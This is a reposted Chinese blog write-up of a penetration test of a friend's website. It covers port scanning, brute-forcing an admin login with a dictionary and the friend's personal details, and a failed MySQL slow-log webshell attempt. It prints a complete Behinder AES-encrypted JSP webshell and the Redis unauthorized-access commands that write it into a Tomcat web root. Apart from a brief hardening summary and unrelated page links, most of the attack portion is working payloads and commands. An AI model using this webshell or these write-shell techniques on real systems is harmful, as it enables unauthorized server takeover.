踩坑版渗透:记某次授权测试 渗透测试违法吗
lipiwang 2024-10-27 13:28 7 浏览 0 评论
转自一位高手的文章:
信息收集
朋友闲聊中,提起想让我帮忙测试下网站的安全性,毕竟好久不做这事,有点手生。于是朋友把站点告诉了我,前部分正常步骤搜集信息,查看ip端口。
PS:本文仅用于学习交流,严禁用于任何非法用途,违者后果自负,与本站及作者无关。
解析出来发现*.*.19*.102,
扫一波端口发现,
21/tcp open
80/tcp open http Microsoft IIS httpd 10.0
6379/tcp open
8085/tcp open http nginx 1.16.1 tianhe
8089/tcp open http 404
8098/tcp open http 404
一看开放服务还不少,挨个来,抓一波redis。
敏感地发现好像有弱密码,直接网站上去试试。还真给我找到了一个**管理系统,祭出我强大的字典,再搞一搞朋友名字的社工,使用burp的intruder。
哈,不出我所料怼了两分钟就怼进去了,而且还是超管,这里就不放过程图了:
到处翻了翻,发现是开发环境。
系统文件上传:
其中有些上传点,竟然接收PUT方法,直接上传,改文件名后缀、内容,burp走一波:
诶,不对,竟然过不去,好家伙!
返回于:
Failed to parse multipart servlet request; nested exception is java.io.IOException: The temporary upload location
java报错,原因是没有该目录,好的吧,记住使用jsp了,用冰蝎的加密马。
<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>
mysql日志写入:
漫游系统中发现有sql数据库管理,貌似是直接拼装sql语句的:
尝试mysql的骚操作-慢日志写入webshell:
SHOW VARIABLES LIKE "%slow_query_log%";
正常的话还可以类似:
set global slow_query_log=1;
set global slow_query_log_file='C:\\Tomcat\\webapps\\ROOT\\conf-back.jsp';
select ' <%@page import="java.util.*,javax.crypto........一句话木马' or sleep(11);
WTF???解析错误??又白高兴了一场,抓了个包看看:
原来是url编码拼接了,而且使用解释器接收语句进行处理,算了,谁让我这么菜呢,给朋友做了太多日志不太好交差。
shiro反序列化:
分析数据包发现响应有rememberMe=deleteMe标识,于是想到最新的shiro反序列化。
拿出我的工具试一下:
工具地址:
https://github.com/fupinglee/ShiroScan/releases
https://github.com/fupinglee/ShiroScan/releases/tag/v1.1
https://github.com/fupinglee/JavaTools/tree/master/Shiro#v20
https://github.com/wh1t3p1g/ysoserial
https://github.com/frohoff/ysoserial
https://mp.weixin.qq.com/s/do88_4Td1CSeKLmFqhGCuQ
我去,不对劲,仔细一看,原来请求数据包只带to**标识,不使用co**ie,于是直接放弃。
redis未授权:
哎呦,一个小站还很牢固,没事,还有别的端口,想起来刚看见的redis,很常见的redis未授权访问。
(参考文章《Redis on Windows 出网利用探索》:https://xz.aliyun.com/t/8153)
但是redis未授权只能写入文件,linux可写公钥,写计划任务反弹,wndows就只能写webshell了,但还有一个现实问题,需要获取真实目录。
于是本菜又在网站里漫游了一波,终于被我发现一个目录浏览功能!
但是当前网站的根目录是不可能访问的,只能解析到其余的盘,于是搜罗了一波。
好像发现了了不得的事情!竟然有某大厂杀毒!
那我得小心了,好多东西需要免杀。
发现好多个tomcat,联想到端口汇总8089和8098都开放但是404,这就正常了,只是测试站点,需要特定目录才能访问。
于是挨个试,终于发现一个aico***的目录:
访问8089发现:
还等什么,试试redis写入功能,可以的话直接免杀webshell:
发现有权限,于是本地搭建环境测试冰蝎马:
可以放心地使用了:
(redis写入字符要用“\”转义)
config set dir "C:\\Program Files\\******\\*****\\ROOT"
config set dbfilename "index-back.jsp"
set xxx1xxx "\<\%\@page import\=\"java\.util\.\*\,javax\.crypto\.\*\,javax\.crypto\.spec\.\*\"\%\>\<\%\!class U extends ClassLoader\{U\(ClassLoader c\)\{super\(c\)\;\}public Class g\(byte \[\]b\)\{return super\.defineClass\(b\,0\,b\.length\)\;\}\}\%\>\<\%if \(request\.getMethod\(\)\.equals\(\"POST\"\)\)\{String k\=\"e45e329feb5d925b\"\;session\.putValue\(\"u\"\,k\)\;Cipher c\=Cipher\.getInstance\(\"AES\"\)\;c\.init\(2\,new SecretKeySpec\(k\.getBytes\(\)\,\"AES\"\)\)\;new U\(this\.getClass\(\)\.getClassLoader\(\)\)\.g\(c\.doFinal\(new sun.misc.BASE64Decoder\(\)\.decodeBuffer\(request\.getReader\(\)\.readLine\(\)\)\)\)\.newInstance\(\)\.equals\(pageContext\)\;\}\%\>"
当然最后别忘了复原:
del xxx1xxx
config set dir "C:\\******\\***** "
config set dbfilename "dump"
访问该页面,没有报错。
冰蝎连接
最后终于松了一口气,总算不是没有啥都没干成,然后整理一下报给朋友,顺便提了几个建议:别把测试服务公开在公网,可以设置白名单访问。
朋友说这是在公网的单一服务器,没有域环境或者工作组,于是就没有了后续步骤,不过朋友说你运气好,就这个服务是管理员权限,其他都是普通用户……我表示,其实我也试了很多,哈哈哈。
总结
总结几点:
避免设置弱密码,使用复杂密码提高测试业务的安全性。
非必要的服务不要暴露在公网。
业务开发时对登录cookie进行加密,避免使用单纯的token校验用户。
常用业务使用普通用户启动….
相关推荐
- 《每日电讯报》研发数字工具,教你更有效率地报道新闻
-
为鼓励新闻编辑部持续创新,《每日电讯报》正在尝试有战略地研发数字工具。网站的数字媒体主任马尔科姆o科尔斯(MalcolmColes)表示,《每日电讯报》正试图去“创建一些可持续资产”,以便于让记者们...
- html5学得好不好,看掌握多少标签
-
html5你了解了多少?如果你还是入门阶段的话,或者还是一知半解的话,那么我们专门为你们收集的html5常用的标签大全对你就很有帮助了,你需要了解了html5有哪些标签你才能够更好的。驾驭html5...
- 前端分享-少年了解过iframe么(我想了解少年)
-
iframe就像是HTML的「内嵌画布」,允许在页面中加载独立网页,如同在画布上叠加另一幅动态画卷。核心特性包括:独立上下文:每个iframe都拥有独立的DOM/CSS/JS环境(类似浏...
- 做SEO要知道什么是AJAX(人能看到但搜索引擎看不到的内容)
-
一个明显的,人能看到但搜索引擎不能看到的内容是AJAX。那么什么是AJAX呢?其实,了解过的基本上也都清楚,AJAX不是新的编程语言,而是一种使用现有标准的新方法。AJAX最大的优点是在不重新加...
- 介绍最前沿的人工智能创新,‘无反向传播’神经网络训练方法?
-
图像由GoogleImageFX生成前言:本文整理自NoProp原始论文与实践代码,并结合多个公开实现细节进行了全流程复现。对神经网络训练机制的探索仍在不断演进,如果你也在研究反向传播之...
- 说说我们对HTML6的期许(对html的看法)
-
HTML5概述HTML5是HTML语言最受欢迎的版本之一,它支持音频和视频、离线存储、移动端、和标签属性等等。还提供了article,section,header这样的标签来帮助开发者更好...
- 浏览器中在线预览pdf文件,pdf.mjs插件实现web预览pdf
-
背景:本来只是淘宝上卖卖袜子,想着扩展一下业务,准备做同名“来家居”海外袜子馆外贸项目,碰到pdf在线预览的需求,就找了pdf.js插件进行实践后把此方法记录下来,可以通过多种方法来实现,每种方法都有...
- SVG 在前端的7种使用方法,你还知道哪几种?
-
本文简介点赞+关注+收藏=学会了技术一直在演变,在网页中使用SVG的方法也层出不穷。每个时期都有对应的最优解。所以我打算把我知道的7种SVG的使用方法列举出来,有备无患~如果你还...
- HTML5常用标签大全(html5em标签)
-
HTML前端开发最终取决于掌握标签的多少HTML大概有七八百个标签楼主这里给大家总结了下HTML常用标签标签描述<!--...-->定义注释。<!DOCTYPE>定义文档类型...
- "伪君子Snoop Dogg!"... WHAT?| MetroDaily 24/7
-
TUE.01-新作品-虽说年纪大了会有点糊涂,但是最近SnoopDogg的这波操作实在是让粉丝们有点迷,甚至有人表示没想到他是这样的"伪君子"......而这一切都源于他近日在IG上Po出的一...
- 莎夏·班克斯盼望表哥Snoop Dogg为其作出场曲
-
NXT女子冠军莎夏·班克斯(SashaBanks)近日接受了迈阿密先驱报采访,访谈纪要如下:关于她出众的形象:“我一向喜欢与众不同。为了能让人眼前一亮,我的装束总是非常前卫、非常抢眼,这样才能让观众...
- 喜欢Snoop!全球第一间「史努比博物馆」海外分馆在东京!
-
1950年起,由美國漫畫家CharlesM.Schulz創作的作品《Snoopy》史努比,其鮮明的可愛角色與幽默的劇情內容,至今仍成為許多大朋友與小朋友心中的最愛。為了紀念作者所設立的全球首...
- Vetements 推出 Snoop Dogg 肖像「天价」T-Shirt
-
Vetements的CEOGuramGvasalia早前才透露品牌经营策略的秘密–Vetements如何成为人人热议的话题品牌。但似乎他仍有更多需要解释的东西–这个法国奢侈品牌最新...
- 狗爷Snoop Dogg的《I Wanna Thank Me》巡回演唱会旧金山站
-
西海岸匪帮说唱歌手SnoopDogg在《IWannaThankMe》巡回演唱会旧金山站表演(图片来自ICphoto)西海岸匪帮说唱歌手SnoopDogg(图片来自ICphoto)西海...
你 发表评论:
欢迎- 一周热门
- 最近发表
- 标签列表
-
- maven镜像 (69)
- undefined reference to (60)
- zip格式 (63)
- oracle over (62)
- date_format函数用法 (67)
- 在线代理服务器 (60)
- shell 字符串比较 (74)
- x509证书 (61)
- localhost (65)
- java.awt.headless (66)
- syn_sent (64)
- settings.xml (59)
- 弹出窗口 (56)
- applicationcontextaware (72)
- my.cnf (73)
- httpsession (62)
- pkcs7 (62)
- session cookie (63)
- java 生成uuid (58)
- could not initialize class (58)
- beanpropertyrowmapper (58)
- word空格下划线不显示 (73)
- jar文件 (60)
- jsp内置对象 (58)
- makefile编写规则 (58)